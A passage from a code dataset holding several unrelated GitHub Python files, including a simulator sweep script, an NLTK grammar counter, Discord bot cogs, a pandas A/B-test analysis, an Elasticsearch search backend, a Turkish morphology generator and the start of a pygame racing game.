\n if currentExperiments == 0: \n for i in range(0,allChanges,1):\n ourInput[\"experiment_{count}\".format(count=i+1)]={\"resv\":allReservationsJson[i]}\n #there were sweeps before -- definitely the more likely scenario\n else:\n #first make a copy so we know what the original was\n #we are editing ourInput\n tmpInput = deepcopy(ourInput)\n count = 1\n numOrigKeys = currentExperiments\n deletedTmpInput = False\n skipAlreadyThere = False\n # update the current experiments first\n # we will update them with just the first new reservationJson\n # then after that we will add new experiments starting with the second new reservationJson\n # so iterate over the keys(experiments) in ourInput\n \n for ikey in ourInput.keys():\n data = deepcopy(ourInput[ikey])\n #about to set the resv to this experiment\n #however, first check that it doesn't already have resv\n #if it does then we are talking about a 2nd,3rd... reservation-sweep\n if dictHasKey(data,\"resv-sweep-number\"):\n #we delete tmpInput because this isn't the first time we are seeing a reservation-sweep\n #that means tmpInput already has reservations associated with it\n # we will update tmpInput to include only the original experiments, before we added ANY\n # reservations, then we will add updated versions of these original experiments WITH our new\n # reservations generated from this particular reservation-sweep\n \n\n # suppose we did a node sweep: 1,2,3\n # ourInput: 3 sims\n # n1\n # n2\n # n3\n # reservation-sweep 1 had 2 changes\n # ourInput: now 6 sims\n # n1 resv1 n1 resv2\n # n2 resv1 n2 resv2\n # n3 resv1 n3 resv2\n #\n # This would be the current state of ourInput and would transfer to tmpInput since we copy it above\n # What we mean to do with a second reservation-sweep is just apply the changes as if applied to the original\n # 3 node sweep\n # reservation-sweep 2 had 3 changes\n # ourInput: now 15 sims\n # n1 resv1 n1 resv2 n1 resv3 n1 resv4 n1 resv5\n # n2 resv1 n2 resv2 n2 resv3 n2 resv4 n2 resv5\n # n3 resv1 n3 resv2 n3 resv3 n3 resv4 n3 resv5\n # however if we kept tmpInput as it was we would have this:\n # ourInput: now 24 sims 9+ than it should. Notice resv3,resv4,resv5 are repeated. 
No extra knowledge will come of it\n # n1 resv1 n1 resv2 n1 resv3 n1 resv3 n1 resv4 n1 resv4 n1 resv5 n1 resv5\n # n2 resv1 n2 resv2 n2 resv3 n2 resv3 n2 resv4 n2 resv4 n2 resv5 n2 resv5\n # n3 resv1 n3 resv2 n3 resv3 n3 resv3 n3 resv4 n3 resv4 n3 resv5 n3 resv5\n\n # We keep a record of the original ourInput by first storing the current number of experiments\n # subsequently we store the amount of changes made, this isn't used yet\n # So we get the amount of original sims from ourList[0] and only include the sim in tmpInput\n # if the current experiment number is less than or equal to it\n # \n # we don't add any of these reservations to the original, that would delete what was already there\n # so we change the starting point when iterating allReservationsJson to include the first reservationJson\n # \n\n if deletedTmpInput == False:\n tmpInput = {}\n deletedTmpInput = True\n \n ourList = deepcopy(data[\"resv-sweep-number\"])\n numExperimentsToAddPerResvJson = ourList[0]\n currentExpNum = int(str(ikey).strip(\"experiment_\"))\n if currentExpNum <= numExperimentsToAddPerResvJson:\n tmpInput.update({ikey:data})\n ourList.append(len(allReservationsJson))\n data[\"resv-sweep-number\"]=deepcopy(ourList)\n \n skipAlreadyThere = True\n count+=1\n continue\n else:\n data[\"resv-sweep-number\"]=deepcopy([numOrigKeys,len(allReservationsJson)])\n data[\"resv\"] = json.dumps(allReservationsJson[0])\n ourInput[ikey] = data\n #this keeps track of what experiment number we are on\n count+=1\n start = 1\n if skipAlreadyThere:\n start = 0\n \n for i in range(start,len(allReservationsJson),1):\n # we skip the first, if we already did it\n # now iterate over the original \"ourInput\" and add our resv to it\n for jkey in tmpInput.keys():\n data = deepcopy(tmpInput[jkey])\n if dictHasKey(data,\"resv-sweep-number\"):\n ourList = deepcopy(data[\"resv-sweep-number\"])\n ourList.append(len(allReservationsJson))\n data[\"resv-sweep-number\"]=deepcopy(ourList)\n else:\n data[\"resv-sweep-number\"]=deepcopy([numOrigKeys,len(allReservationsJson)])\n \n data[\"resv\"] = json.dumps(allReservationsJson[i])\n ourInput[\"experiment_{count}\".format(count=count)] = data\n #again this keeps track of what experiment number we are on\n count+=1\n\n","repo_name":"cswalke1/simulator","sub_path":"basefiles/sweeps/reservation_sweep.py","file_name":"reservation_sweep.py","file_ext":"py","file_size_in_byte":23298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26320207286","text":"from pathlib import Path\n\nimport csv\n\nfrom connection import *\n\n\nif __name__ == '__main__':\n init()\n\n input_path = Path(\"./random_strings_edited.csv\")\n\n with input_path.open(\"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n insert_line(row)\n\n for row in get_all_rows():\n print(row)\n","repo_name":"Valemos/ozzylogik_jun_python_dev","sub_path":"mysql/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31290122346","text":"import nltk\nfrom nltk.corpus import treebank\nfrom nltk.grammar import CFG, Nonterminal\n\nfreq_count = {}\n\ndef replace_chars(string):\n string = string.replace(\"#\", \"HASH\")\n string = string.replace(\":\", \"COLON\")\n string = string.replace(\",\", \"COMMA\")\n string = string.replace(\".\", \"PERIOD\")\n return string\n\nfor sent in treebank.parsed_sents():\n sent.chomsky_normal_form()\n for 
production in sent.productions():\r\n        if production.is_nonlexical():\r\n            lhs = production.lhs()\r\n            rhs = production.rhs()\r\n            if lhs in freq_count and rhs in freq_count[lhs]:\r\n                freq_count[lhs][rhs]+=1\r\n            elif lhs in freq_count:\r\n                freq_count[lhs][rhs] = 1\r\n            else:\r\n                freq_count[lhs] = {}\r\n                freq_count[lhs][rhs] = 1\r\n\r\ngrammar_file = open('grammar_test.gr', 'w')\r\ngrammar_file.write('99 TOP S\\n')\r\n\r\nfor nonterminal in freq_count:\r\n    for prod in freq_count[nonterminal]:\r\n        if freq_count[nonterminal][prod] > 0:\r\n            grammar_file.write('{} {} '.format(freq_count[nonterminal][prod], replace_chars(str(nonterminal))))\r\n            for p in prod:\r\n                grammar_file.write(replace_chars(str(p)) + \" \")\r\n            grammar_file.write(\"\\n\")\r\n\r\n","repo_name":"bnelo12/Parser-Competition","sub_path":"get_nonterminal_prob.py","file_name":"get_nonterminal_prob.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"41858171925","text":"import discord\r\nimport asyncio\r\nfrom datetime import datetime\r\nimport gspread \r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport mysql.connector\r\nfrom numpy import exp, dot, random, array\r\nimport random\r\n\r\nimport SecretStuff\r\nimport MoBotDatabase\r\n\r\nmoBot = 449247895858970624\r\nmoBotTest = 476974462022189056\r\nmo = 405944496665133058\r\n\r\nspaceChar = \"Рађ\"\r\n\r\nasync def main(args, message, client):\r\n    now = datetime.now()\r\n    for i in range(len(args)):\r\n        args[i].strip()\r\n# end main\r\n\r\nasync def mainReactionAdd(message, payload, client): \r\n    pass\r\n# end mainReactionAdd\r\n\r\nasync def mainReactionRemove(message, payload, client):\r\n    pass\r\n# end mainReactionRemove\r\n\r\nasync def memberJoin(member):\r\n    pass\r\n# end memberJoin\r\n\r\nasync def memberRemove(member, client):\r\n    pass\r\n# end memberRemove\r\n\r\ndef play(mode):\r\n    def checkForWinner(board):\r\n        checks = []\r\n\r\n        diagCheck1 = []\r\n        diagCheck2 = []\r\n\r\n        for i in range(3): \r\n            diagCheck1.append(board[i+(i*3)])\r\n            diagCheck2.append(board[i*2+2])\r\n\r\n            rowCheck = []\r\n            colCheck = []\r\n\r\n            for j in range(3):\r\n                rowCheck.append(board[i*3+j])\r\n                colCheck.append(board[j*3+i])\r\n\r\n            checks.append(rowCheck)\r\n            checks.append(colCheck)\r\n\r\n        checks.append(diagCheck1)\r\n        checks.append(diagCheck2)\r\n\r\n        winner = None\r\n        for check in checks:\r\n            checkSpot = None\r\n            i = 0\r\n            while True:\r\n                checkSpot = check[i]\r\n                if (checkSpot == \" \"):\r\n                    break\r\n\r\n                i += 1\r\n                if (checkSpot != check[i]):\r\n                    break\r\n                elif (i == 2):\r\n                    if (checkSpot == check[i]):\r\n                        winner = check[i]\r\n                        return winner\r\n                        break\r\n        return winner\r\n    # end checkForWinner\r\n\r\n    def displayBoard(board):\r\n        for i in range(0, 9, 3):\r\n            print(\"|\".join(board[i:i+3]))\r\n    # end displayBoard\r\n\r\n    def goPlayer(mode, players, playerTurn, board):\r\n        def checkIfOpen(spot, board):\r\n            return board[spot] == \" \"\r\n        # end checkIfOpen\r\n\r\n        while True:\r\n            if (mode == 1):\r\n                spot = random.randint(0, 8)\r\n\r\n            if (checkIfOpen(spot, board)):\r\n                board[spot] = \"X\" if ((playerTurn + 1) // 2 == 0) else \"O\"\r\n                return board\r\n    # end goPlayerOne\r\n\r\n    players = []\r\n    r = random.random()\r\n    if (mode == 1):\r\n        players = [\"PC1\", \"PC2\"]\r\n    else:\r\n        if (r > .5):\r\n            players = [\"PC1\", \"Human\"]\r\n        else:\r\n            players = [\"Human\", \"PC2\"]\r\n\r\n    print(\"\\nX: %s\\nO: %s\\n\" % (players[0], players[1]))\r\n\r\n    board = [\" \"] * 9\r\n\r\n    playerTurn = 1\r\n    while True: # game loop\r\n        playerTurn = playerTurn * -1\r\n\r\n        print(\"Go %s\" % (\"X\" if ((playerTurn + 1) // 2 == 0) else \"O\"))\r\n        board = goPlayer(mode, players, playerTurn, board)\r\n        displayBoard(board)\r\n\r\n        winner = checkForWinner(board)\r\n        if (winner is not 
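The treebank record above only writes raw CNF production counts to grammar_test.gr; dividing each count by its left-hand-side total is what turns the table into the conditional probabilities P(rhs | lhs) that a PCFG needs. A sketch over toy counts standing in for freq_count (the nltk types are not needed for the arithmetic):

```python
# Normalizing raw production counts (as collected above) into per-LHS
# probabilities, i.e. P(rhs | lhs) for a PCFG; toy counts stand in for freq_count.
freq_count = {
    "S": {("NP", "VP"): 90, ("VP",): 10},
    "NP": {("DT", "NN"): 60, ("NNP",): 40},
}

prob = {}
for lhs, rhs_counts in freq_count.items():
    total = sum(rhs_counts.values())
    prob[lhs] = {rhs: count / total for rhs, count in rhs_counts.items()}

for lhs, dist in prob.items():
    for rhs, p in dist.items():
        print(f"{p:.2f}  {lhs} -> {' '.join(rhs)}")
```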
None):\r\n                return \"Winner: %ss\" % winner\r\n        input()\r\n    # end while\r\n# end play\r\n\r\nprint(play(1))\r\n#play(int(input(\"PC vs PC: 1\nHuman vs PC: 2\nChoose 1 or 2: \")))","repo_name":"nosv1/MoBot","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"30665913043","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\npd.set_option('display.max_columns', None)\n\n\nab_data = pd.read_csv('C:/Users/nick-/Documents/DS/projects/SF_tasks/ab_data.csv', sep=',')\n\nab_data['timestamp'] = pd.to_datetime(ab_data['timestamp'], format='%Y-%m-%d')\n\ndaily_data = ab_data.groupby(['timestamp', 'group']).agg({\n    'user_id':'count',\n    'converted':'sum'\n})\\\n    .reset_index().rename(columns={'user_id': 'users_count'})\n\ndaily_data['conversion'] = daily_data['converted']/daily_data['users_count']*100\n\n\n# # create a figure of size 8x4\n# fig = plt.figure(figsize=(8, 4))\n# # # add an axes (coordinate system)\n# # ax = fig.add_axes([8, 4, 1, 1])\n# # draw a boxplot of conversion by group\n# sns.boxplot(data=daily_data, x='conversion', y='group')\n#\n#\n# plt.show()\n\n\n\n# conversion_piv = daily_data.groupby('group')['conversion'].agg(\n#     ['mean', 'median']\n# )\n# print(conversion_piv)\n\n\n'''looking at conversion by day'''\n# # create a figure of size 8x4\n# fig = plt.figure(figsize=(8,4))\n# # add an axes (coordinate system)\n# ax = fig.add_axes([0.1, 0.2, 0.8, 0.7])\n# # draw a lineplot of conversion over time for each group\n# sns.lineplot(\n#     data=daily_data,\n#     x='timestamp',\n#     y='conversion',\n#     hue='group',\n#     ax=ax\n# )\n# # set the plot title\n# ax.set_title('Conversion by day')\n# # rotate the x-axis tick labels\n# ax.xaxis.set_tick_params(rotation=45)\n# # turn on the grid\n# ax.grid();\n# plt.show()\n\n'''looking at the data as a cumulative total'''\n# # select the group A data\n# daily_data_a = daily_data[daily_data['group'] == 'A']\n# # compute the cumulative number of visitors\n# daily_data_a.loc[:, 'cum_users_count'] = daily_data_a['users_count'].cumsum()\n# # print the timestamp, visitor count and cumulative visitor count\n# print(daily_data_a[['timestamp', 'users_count', 'cum_users_count']].head())\n\n\n'''computing cumulative data for both groups at once'''\n# compute the cumulative sum of visitor counts\ndaily_data['cum_users_count'] = daily_data.groupby(['group'])['users_count'].cumsum()\n# compute the cumulative sum of completed target actions (conversions)\ndaily_data['cum_converted'] = daily_data.groupby(['group'])['converted'].cumsum()\n# compute the cumulative conversion rate\ndaily_data['cum_conversion'] = daily_data['cum_converted']/daily_data['cum_users_count'] * 100\n# print(daily_data.head())\n\n\n'''plotting the cumulative conversion'''\n# create a figure of size 12x6\nfig = plt.figure(figsize=(12, 6))\n# add an axes (coordinate system)\nax = fig.add_axes([0.1, 0.2, 0.8, 0.7])\n# draw a lineplot of cumulative conversion over time for each group\nsns.lineplot(x='timestamp', y='cum_conversion', data=daily_data, hue='group', ax=ax)\n# set the plot title\nax.set_title('Cumulative conversion by day')\n# rotate the x-axis tick labels\nax.xaxis.set_tick_params(rotation = 45)\n# turn on the grid\nax.grid(True)\nplt.show()","repo_name":"nickkh1/PycharmProjects1","sub_path":"DS_skillfactory/MOD_18_EDA/EDA_10_AB_testing.py","file_name":"EDA_10_AB_testing.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14169786819","text":"\"\"\"Base search backend.\"\"\"\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom django_elasticsearch_dsl import fields\nfrom rest_framework.filters import BaseFilterBackend\nfrom rest_framework.settings import api_settings\n\nfrom ..mixins import FilterBackendMixin\nfrom ...compat import coreapi, coreschema\nfrom ...constants import MATCHING_OPTIONS, DEFAULT_MATCHING_OPTION\n\n__title__ = 'django_elasticsearch_dsl_drf.filter_backends.search.common'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n    'BaseSearchFilterBackend',\n)\n\n\nclass BaseSearchFilterBackend(BaseFilterBackend, FilterBackendMixin):\n    \"\"\"Base search filter backend.\"\"\"\n\n    query_backends = []\n\n    matching = DEFAULT_MATCHING_OPTION\n\n    search_param = api_settings.SEARCH_PARAM\n\n    def get_search_query_params(self, request):\n        \"\"\"Get search query params.\n\n        :param request: Django REST framework request.\n        :type request: rest_framework.request.Request\n        :return: List of search query params.\n        :rtype: list\n        \"\"\"\n        query_params = request.query_params.copy()\n        return query_params.getlist(self.search_param, [])\n\n    def get_query_backends(self, request, view):\n        \"\"\"Get query backends.\n\n        :return:\n        \"\"\"\n        raise NotImplementedError(\n            \"You should define `get_query_backends` method in your {} class\"\n            \"\".format(self.__class__.__name__)\n        )\n\n    def _get_query_backends(self, request, view):\n        \"\"\"Get query backends internal.\n\n        :param request:\n        :param view:\n        :return:\n        \"\"\"\n        try:\n            return self.get_query_backends(request, view)\n        except NotImplementedError:\n            pass\n\n        if not self.query_backends:\n            raise NotImplementedError(\n                \"Your search backend shall either implement \"\n                \"`get_query_backends` method or define `query_backends` \"\n                \"property.\"\n            )\n        return self.query_backends[:]\n\n    def filter_queryset(self, request, queryset, view):\n        \"\"\"Filter the queryset.\n\n        :param request: Django REST framework request.\n        :param queryset: Base queryset.\n        :param view: View.\n        :type request: rest_framework.request.Request\n        :type queryset: elasticsearch_dsl.search.Search\n        :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n        :return: Updated queryset.\n        :rtype: elasticsearch_dsl.search.Search\n        \"\"\"\n        if self.matching not in MATCHING_OPTIONS:\n            raise ImproperlyConfigured(\n                \"Your `matching` value does not match the allowed matching \"\n                \"options: {}\".format(', '.join(MATCHING_OPTIONS))\n            )\n\n        __query_backends = self._get_query_backends(request, view)\n\n        if len(__query_backends) > 1:\n            __queries = []\n            for query_backend in __query_backends:\n                __queries.extend(\n                    query_backend.construct_search(\n                        request=request,\n                        view=view,\n                        search_backend=self\n                    )\n                )\n\n            if __queries:\n                queryset = queryset.query(\n                    'bool',\n                    **{self.matching: __queries}\n                )\n\n        elif len(__query_backends) == 1:\n            __query = __query_backends[0].construct_search(\n                request=request,\n                view=view,\n                search_backend=self\n            )\n            queryset = queryset.query('bool', **{self.matching: __query})\n\n        else:\n            raise ImproperlyConfigured(\n                \"Search filter backend shall have at least one query_backend \"\n                
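The A/B-test record above derives its cumulative conversion with two grouped cumsum calls. The same three lines on a toy frame make the mechanics easy to check by hand (column names follow the original; the numbers are made up):

```python
# The grouped running-total trick from the A/B record above, on toy numbers:
# cumulative conversion = cumsum(converted) / cumsum(users) within each group.
import pandas as pd

daily = pd.DataFrame({
    "group":       ["A", "A", "A", "B", "B", "B"],
    "users_count": [100, 120,  80, 110,  90, 100],
    "converted":   [ 10,  18,   8,  11,  18,  10],
})

daily["cum_users_count"] = daily.groupby("group")["users_count"].cumsum()
daily["cum_converted"] = daily.groupby("group")["converted"].cumsum()
daily["cum_conversion"] = daily["cum_converted"] / daily["cum_users_count"] * 100
print(daily)
```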
\"specified either in `query_backends` property or \"\n \"`get_query_backends` method. Make appropriate changes to\"\n \"your {} class\".format(self.__class__.__name__)\n )\n\n return queryset\n\n def get_coreschema_field(self, field):\n if isinstance(field, fields.IntegerField):\n field_cls = coreschema.Number\n else:\n field_cls = coreschema.String\n return field_cls()\n\n def get_schema_fields(self, view):\n assert coreapi is not None, 'coreapi must be installed to ' \\\n 'use `get_schema_fields()`'\n assert coreschema is not None, 'coreschema must be installed to ' \\\n 'use `get_schema_fields()`'\n\n _search_fields = getattr(view, 'search_fields', None)\n if isinstance(_search_fields, dict):\n search_fields = list(_search_fields.keys())\n else:\n search_fields = _search_fields\n\n return [] if not search_fields else [\n coreapi.Field(\n name=self.search_param,\n required=False,\n location='query',\n schema=coreschema.String(\n description='Search in '\n '{}.'.format(', '.join(search_fields))\n )\n )\n ]\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/filter_backends/search/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"6508892693","text":"import discord\nimport random\nfrom discord.ext import commands\nfrom listofnames import first_names, last_names\n# from dotenv import load_dotenv\n# load_dotenv()\nclass RandomFunc(commands.Cog):\n def __init__(self , bot):\n self.bot = bot\n\n @commands.command(aliases = ['rand'])\n async def randomname(self , ctx , *args):\n if(len(args)==1):\n num = int(args[0])\n if(num<=5 and num>0):\n final_msg = \"\"\n for i in range(num):\n f_ind = random.randint(0 , len(first_names)-1)\n l_ind = random.randint(0 , len(last_names)-1)\n random.shuffle(first_names)\n random.shuffle(last_names)\n name = first_names[f_ind] + \" \" + last_names[l_ind]\n final_msg = final_msg + name + \"\\n\"\n \n await ctx.send(final_msg)\n\n elif(num==0):\n await ctx.send(\"Do you really want a name or you just want to waste my time?\") \n else:\n await ctx.send(\"How many names do you need man! 
:nerd:\")\n elif(len(args)==0):\n f_ind = random.randint(0 , len(first_names)-1)\n l_ind = random.randint(0 , len(last_names)-1)\n random.shuffle(first_names)\n random.shuffle(last_names)\n name = first_names[f_ind] + \" \" + last_names[l_ind]\n await ctx.send(name)\n else:\n await ctx.send(\"Send valid arguments :nerd:\")\n \n @commands.command(aliases = ['nrand'])\n async def randomnum(self , ctx , *args):\n try:\n num1 = int(args[0])\n num2 = int(args[1])\n if(num1>num2):\n await ctx.send('First argument should be less than the second one')\n elif(num1==num2):\n await ctx.send('Do you really want a random number :|')\n else:\n randnum = random.randint(num1 , num2)\n await ctx.send(randnum)\n except:\n await ctx.send('Please send valid input :pleading_face:')\n\ndef setup(bot):\n bot.add_cog(RandomFunc(bot))","repo_name":"delta7-138/HugoBot","sub_path":"cogs/randomfunc.py","file_name":"randomfunc.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22787745107","text":"class Solution:\r\n def getModifiedArray(self, length: int, updates: List[List[int]]) -> List[int]:\r\n #Time: O(n)\r\n #Space: O(n)\r\n \r\n #Mark down what happens at each idx\r\n inc = [0] * length\r\n dec = [0] * length\r\n \r\n for start, end, add in updates:\r\n inc[start] += add #Add this up before assigning to output\r\n dec[end] += add #Cancel out with this before moving on to the next idx\r\n \r\n #Update the output arrray according to our prefix sum\r\n output = [None for _ in range(length)]\r\n prefixSum = 0\r\n \r\n for idx in range(length):\r\n prefixSum += inc[idx]\r\n output[idx] = prefixSum\r\n prefixSum -= dec[idx]\r\n \r\n return output","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0370-Range-Addition.py","file_name":"0370-Range-Addition.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42982971215","text":"import setuptools\n\nwith open(\"README.md\", 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"Ddnet\",\n version=\"0.0.5\",\n author=\"Zichuana\",\n author_email=\"2092653757@qq.com\",\n description=\"This is a test. 
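The Range Addition record above keeps separate `inc`/`dec` arrays; the more common single difference-array formulation does the same O(n) work, adding at `start`, subtracting just past `end`, then taking one prefix sum. A sketch of that variant with a worked check against the same semantics:

```python
# Single difference-array variant of the range-addition solution above:
# add at `start`, subtract right after `end`, then prefix-sum once.
def get_modified_array(length, updates):
    diff = [0] * (length + 1)
    for start, end, add in updates:
        diff[start] += add
        diff[end + 1] -= add
    out, running = [], 0
    for idx in range(length):
        running += diff[idx]
        out.append(running)
    return out

# [0,0,0,0,0] with updates [1,3,+2], [2,4,+3], [0,2,-2]
print(get_modified_array(5, [[1, 3, 2], [2, 4, 3], [0, 2, -2]]))
# expected: [-2, 0, 3, 5, 3]
```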
This project is not very useful!!!\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/Zichuana/Ddnet\",\n    packages=setuptools.find_packages(),\n    install_requires=['pandas', 'matplotlib', 'numpy', 'scipy', 'pandas_profiling', 'folium', 'seaborn'],  # 'random' and 'os' are standard-library modules and must not be listed here\n    # add any additional packages that need to be installed along with SSAP package.\n\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n)\n","repo_name":"Zichuana/Ddnet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10151279208","text":"def memoize(f):\n    cache = {}\n    return lambda *args: cache[args] if args in cache else cache.update({args: f(*args)}) or cache[args]\n\n@memoize\ndef fib(n):\n    return n if n < 2 else fib(n-2) + fib(n-1)\n\n# Clean memoized fibonacci calculator\n\ndef problem2():\n    acc = 0 \n    n = 1\n    while fib(n) < 4000000:\n        fibs = fib(n)\n        if fibs % 2 == 0:\n            acc += fibs\n        n += 1\n    return acc\n","repo_name":"respectus/Euler-Problems","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26052468992","text":"import re\nfrom typing import Generator\n\nfrom turkish_morphology import analysis_pb2\nfrom turkish_morphology import fst\nfrom turkish_morphology import pretty_print\n\nfrom external.org_openfst import pywrapfst\n\n_Analysis = analysis_pb2.Analysis\n_Ig = analysis_pb2.InflectionalGroup\n_SymbolTable = pywrapfst.SymbolTable\n\n_SYMBOLS_REGEX = re.compile(\n    # First inflectional group.\n    r\"\\(.+?\\[[A-Z\\.,:\\(\\)\\'\\-\\\"`\\$]+?\\]|\"\n    # Inflectional group boundaries.\n    r\"\\)?\\(\\[[A-Z]+?\\]|\"\n    # Derivational morphemes.\n    r\"-(?:[^\\W\\d_]|')+?\\[[A-z]+?=[A-z]+?\\]|\"\n    # Inflectional morphemes and features.\n    r\"\\+(?:[^\\W\\d_]|['\\.])*?\\[[A-z]+?=[A-z0-9]+?\\]|\"\n    # Proper noun analysis.\n    r\"\\)\\+\\[Proper=(?:True|False)\\]|\"\n    # Numbers.\n    r\"\\d+(?:\\[[A-Z]+?\\])?|\"\n    # Parenthesis or decimal point separators.\n    r\"[\\(\\.,]\")\n\n\ndef _lower(string: str) -> str:\n  \"\"\"Properly lowercases a Turkish string (\"İ\" -> \"i\", \"I\" -> \"ı\").\"\"\"\n  return string.replace(\"İ\", \"i\").replace(\"I\", \"ı\").lower()\n\n\ndef _add_proper(analysis: _Analysis) -> _Analysis:\n  \"\"\"Adds the proper feature to the last inflectional group if it is missing.\"\"\"\n  last_ig = analysis.ig[-1]\n\n  if last_ig.HasField(\"proper\"):\n    return analysis\n\n  with_proper = _Analysis()\n  with_proper.CopyFrom(analysis)\n  with_proper.ig[-1].proper = last_ig.pos == \"NNP\"\n  return with_proper\n\n\ndef _symbol_indices(analysis: _Analysis,\n                    symbol_table: _SymbolTable) -> Generator[int, None, None]:\n  \"\"\"Generates the label indices for the symbols that construct the analysis.\"\"\"\n  human_readable = pretty_print.analysis(analysis)\n  symbols = _SYMBOLS_REGEX.findall(human_readable)\n  yield from map(symbol_table.find, symbols)\n\n\ndef surface_form(analysis: _Analysis) -> str:\n  \"\"\"Generates surface form for the given morphological analysis.\n\n  This function assumes that the input analysis protobuf is structurally\n  well-formed, meaning that it should first be validated with\n  //turkish_morphology:validate.py.\n\n  Args:\n    analysis: morphological analysis 
of a Turkish word from which surface form\n will be generated.\n\n Returns:\n Surface form of the Turkish word whose morphological analysis is the\n given morphological analysis. Returns an empty string if a surface form\n cannot be generated from the given morphological analysis.\n \"\"\"\n symbol_table = fst.ANALYZER.input_symbols()\n symbol_indices = _symbol_indices(_add_proper(analysis), symbol_table)\n input_ = fst.compile(symbol_indices, symbol_table)\n output = fst.compose(fst.ANALYZER, input_)\n\n if output.start() == -1: # has no path to the accept state.\n return \"\"\n\n surface_forms = fst.extract_parses(output, output.start(), \"ilabel\")\n surface_forms = list(set(map(_lower, surface_forms)))\n return surface_forms[0]\n","repo_name":"google-research/turkish-morphology","sub_path":"turkish_morphology/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"72"} +{"seq_id":"16378115416","text":"import pygame\nimport time \nimport random\nimport sys\npygame.init()\n\n#colors\ngray = (64, 62, 57)\nwhite = (255,255,255)\nblack = (0,0,0)\nred = (200,0,0)\nblue = (0,0,200)\ngreen = (0,200,0)\nbright_red = (255,0,0)\nbright_green = (0,255,0)\nbright_blue = (0,0,255)\n\nwindow_width = 800\nwindow_height = 600\ncar_width = 56\npause = False\n\n\n#display\ngd = pygame.display.set_mode((window_width,window_height))\npygame.display.set_caption(\"CAR-RACE\")\ncarimg = pygame.image.load('c3.png')\nclock = pygame.time.Clock()\nbgimg = pygame.image.load('bg.png')\nintro_bg = pygame.image.load('b-1.jpg')\ninstrct_bg = pygame.image.load('b-2.jpg')\npause_bg = pygame.image.load('b-3.jpg')\nwstrip = pygame.image.load('white.png')\ny1 = pygame.image.load('y1.png')\nyy2 = pygame.image.load('y-2.png')\ny3 = pygame.image.load('y-3.png')\nllane = pygame.image.load('lane.png')\nrlane = pygame.image.load('rlane.png')\nbgd = pygame.image.load('bg-4.png')\n\ncrash_sound = pygame.mixer.Sound(\"pexp.wav\")\ncar_sound = pygame.mixer.Sound(\"car.wav\")\nhorn_sound = pygame.mixer.Sound(\"horn.wav\")\n\n\ndef intro_loop():\n intro =True\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(intro_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',115)\n TextSurf,TextRect = text_objects(\"CITY RACE\",largetext)\n TextRect.center = (400,100)\n gd.blit(TextSurf,TextRect)\n button(\"START\",150,520,100,50,green,bright_green,\"play\")\n button(\"QUIT\",550,520,100,50,red,bright_red,\"quit\")\n button(\"INSTRUCTIONS\",300,520,200,50,blue,bright_blue,\"instrct\")\n pygame.display.update()\n clock.tick(50)\n\ndef countdown_bg():\n font = pygame.font.SysFont(None,25)\n x = (window_width*0.45)\n y = (window_height*0.8)\n gd.blit(bgimg,(0,0))\n text = font.render(\"Car Passed : 0\",True,black)\n score = font.render(\"SCORE : 0\",True,bright_red)\n gd.blit(text,(0,50))\n gd.blit(score,(0,30))\n button(\"Pause\",675,0,100,50,green,bright_green,\"pause\")\n\ndef countdown():\n cntdwn = True\n while cntdwn:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"3\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n\n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = 
